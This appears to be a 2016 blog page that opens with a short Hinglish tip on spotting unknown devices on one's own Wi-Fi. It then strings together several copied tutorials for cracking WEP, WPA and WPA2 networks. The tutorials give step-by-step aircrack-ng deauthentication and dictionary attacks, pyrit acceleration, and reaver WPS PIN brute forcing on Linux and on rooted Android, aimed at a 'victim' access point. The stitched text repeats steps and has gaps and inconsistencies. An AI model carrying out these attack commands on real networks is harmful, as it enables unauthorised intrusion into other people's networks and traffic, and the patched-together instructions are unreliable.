Showing posts with label Wi fi zone. Show all posts
Showing posts with label Wi fi zone. Show all posts

Wednesday, 2 March 2016

How to protect wifi in victoms and peoples

нι gυyѕ 😉
     " aaj aap ѕaвĸĸo new тrιcĸѕ ѕнare ĸrтa нoo "
    внυт ѕe log wιғι lgwaaтe нaι втт ĸaι log wιтнoυт perмιѕѕιon υnĸa wιғι υѕe ĸrтe нaι
  
👿 ѕooo ι нave ѕolυтιon ιn тнιѕ prвln 👿

ѕaвѕe pнle eĸ ѕoғтware dwnl ĸre google ѕe
     " wнo υѕe мy wιғι "

 1.Download Hone k bd ap is ko apne PC mai Install kare

Download this app click here

2. Install hone k bd jub ap os ko open kare ge to asi Screen aajaye gito ap ne sub se pehle Scan pr Click kerna hain ta k All Connect Devices ki list Show hojaye.

3. Ab is main jo ap Khud use kerte hain os ko Select kar k "Known" ka Option Select kare  or  jo ap nahi use kerhe ose k leye "Unknown"ka option select kare ya ose Remove kerde.

4.or Last mai "Known" or"Unknown" ka option Select kerne k bd"Save Changes" pr Click kare. is tra ap jitni chahe Devices ko Block kerskte hai or apne WIFI INTERNET ko Safe bna sakte hain.

   👉🏻 Umeed hai ap ko ye Artical Passand aaya hoga



Hack WEP | WPA | WPA2 Protected Wifi Using Kali Linux 2016


How to Crack WEP protected wifi using backtrack terminal.

1.  Start kali linux and open terminal in kali linux.
2.  Type command : airmon-ng
           (Check weather your wireless card is avilable and working properly)
3.  Type command : airmon-ng start wlan0
           (put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4.  Type command: airodump-ng mon0
            (command to listen to the wireless network around you and get details about them.)
5.  Type command : airodump-ng –w File name of packet to save –c Target channel no --bssid BSSID of target name mon0
               (  eg: airodump-ng –w MTNL-01 –c 3 --bssid 11:22:33:44:55:66 mon0)
              (command start capturing the packet to crack the wifi password.)
6.  Type command : aireplay-ng -0 0 -a 11:22:33:44:55:66  mon0
           (Above command help to capture the packet more faster. if there is only few packets coming then you can try to deauth to generate more data packets with following command)
7.  Type command:aircrack-ng MTNL-01.cap
            ( AirCrack to crack the WEP key )


How to Crack WPA/WPA2 Protected Wi-Fi with dictionary

1.  Start kali linux and open terminal in kali linux.
2.  Type command : airmon-ng
           (Check weather your wireless card is avilable and working properly)
3.  Type command : airmon-ng start wlan0
           (put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4.  Type command: airodump-ng mon0
            (command to listen to the wireless network around you and get details about them.)
5.  Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
               (  eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
              (This means airodump-ng has successfully captured the handshake.
6.  Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
              [Send directed DeAuth (attack is more effective when it is targeted) ].
7.  Type command:   aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap
[Note: Default directory for wordlist in linux:  /usr/share/wordlists/rockyou.txt.gz]

Steps to attach dictionery

            [ -w=The name of the dictionary file
             -b=The MAC address of the access point
              MTNL.cap=The name of the file that contains the authentication handshake ]
1. cp /usr/share/wordlists/rockyou.txt.gz  (copy the file to root directory)
2. gunzIP rockyou.txt.gz    (UnzIP the file)
3. mv newrockyou.txt wordlist.lst    (rename the file from newrockyou to wordlist)



How To Speed Up Wifi Cracking Process using pyrit

In the dictionary and crunch attack, PMKs speed is near 4000 which will take lots of time to crack wifi so use the below trick to increase the speed of attack. This will provide 60000-100000 PMKs depends on client hardware.
1.  Start kali linux and open terminal in kali linux.
2.  Type command : airmon-ng
           (Check weather your wireless card is avilable and working properly)
3.  Type command : airmon-ng start wlan0
           (put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4.  Type command: airodump-ng mon0
            (command to listen to the wireless network around you and get details about them.)
5.  Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
               (  eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
              (This means airodump-ng has successfully captured the handshake.
[Note: Default directory for wordlist in linux:  /usr/share/wordlists/rockyou.txt.gz]

 

Steps to attach dictionary

1. cp /usr/share/wordlists/rockyou.txt.gz  (copy the file to root directory)
2. gunzIP rockyou.txt.gz    (UnzIP the file)
3. mv newrockyou.txt wordlist.lst    (rename the file from newrockyou to wordlist)

 

Download and install pyrit

1.  svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn   (Download the file)
2.  cd pyrit_svn/pyrit/ ./setup.py build install       (build and install setup.py file)
3.  cd ..                          (step back to pyrit_svn)
4.  Cd cpyrit_calpp    (go to  cpyrit_calpp directory)
5.  Edit setup.py  and find VERSION = '0.4.0-dev and change to VERSION = '0.4.1-dev also
                find CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include')) and replace with CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))
                        Save the file and run using below command
6.  ./setup.py build install   (build and install  and edited file)
7.  pyrit –e MTNL create_essid   (Create essid in pyrit databases)
8.  pyrit -i  wordlist .lst import_passwords     (import the dictionary in pyrit databases)
9.  pyrit batch           ( create table in pyrit databases
10.pyrit –r MTNL .cap attack_db       (perform attack on handshake file)

5 Steps Wifi Hacking – Cracking WPA2 Password:


1. Open our terminal (CTRL+ALT+T) and type airmon-ng

this command will lists our wireless card that attached with our system.
2. The next step we need to stop our wireless monitor mode by running airmon-ng stop wlan0

3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.

From the picture above, we can see many available access point with all the information. In the green box is our victim access point which is my own access point
Information:
BSSID (Basic Service Set Identification): the MAC address of access point
PWR: Signal level reported by the card.
Beacons: Number of announcements packets sent by the AP
#Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
#/s: Number of data packets per second measure over the last 10 seconds.
CH: Channel number (taken from beacon packets).
MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
ENC: Encryption algorithm in use.
CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
AUTH: The authentication protocol used.
ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.
4. From the step 3 above, we can find access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether target AP has WPS enabled or not.
wash -i wlan0 -c 8 -C -s

if the WPS Locked status is No, then we ready to crack and move to step 5.
5. The last step is cracking the WPA2 password using reaver.
reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360
Because we already get the information from step 3 above, so my command look like this:
reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360

it took about 5 hours to crack 19 characters WPA2 password (vishnuvalentino.com) from my Kali virtualBox, but it depend with our hardware and wireless card.
Conclusions:
1. WPA and WPA2 security implemented without using the Wi-Fi Protected Setup (WPS) feature are unaffected by the security vulnerability.
2. To prevent this attack, just turn off our WPS/QSS feature on our access point. See picture below (I only have the Chinese version )

Notes: Only practice this tutorial on your own lab and your own device. Hacking can be a crime if you don't know where to put it.

WPA2 WPS Routers

  1. Image titled Hack Wi Fi Using Android Step 1
    1
    Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:
    • Nexus 7
    • Galaxy Ace/S1/S2/S3
    • Nexus One
    • Desire HD
  2. Image titled Hack Wi Fi Using Android Step 2
    2
    Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.
    • To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of this article goes into more detail.
  3. Image titled Hack Wi Fi Using Android Step 3
    3
    Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported.
    • Your device must be rooted in order to run bcmon.
  4. Image titled Hack Wi Fi Using Android Step 4
    4
    Download and install Reaver. Reaver is a program developed to crack the WPS PIN in order to retrieve the WPA2 passphrase. The Reaver APK can be downloaded from the developers' thread on the XDA-developers forums.
  5. Image titled Hack Wi Fi Using Android Step 5
    5
    Launch Reaver. Tap the Reaver for Android icon in your App drawer. After confirming that you are not using it for illegal purposes, Reaver will scan for available access points. Tap the access point you want to crack to continue.
    • You may need to verify Monitor Mode before proceeding. If this is the case, bcmon will open again.
    • The access point you select must accept WPS authentication. Not all routers support this.
  6. Image titled Hack Wi Fi Using Android Step 6
    6
    Verify your settings. In most cases you can leave the settings that appear at their default. Make sure that the "Automatic advanced settings" box is checked.
  7. Image titled Hack Wi Fi Using Android Step 7
    7
    Start the cracking process. Tap the "Start attack" button at the bottom of the Reaver Settings menu. The monitor will open and you will see the results of the ongoing crack displayed.
    • Cracking WPS can take anywhere from 2-10+ hours to complete, and it is not always successful.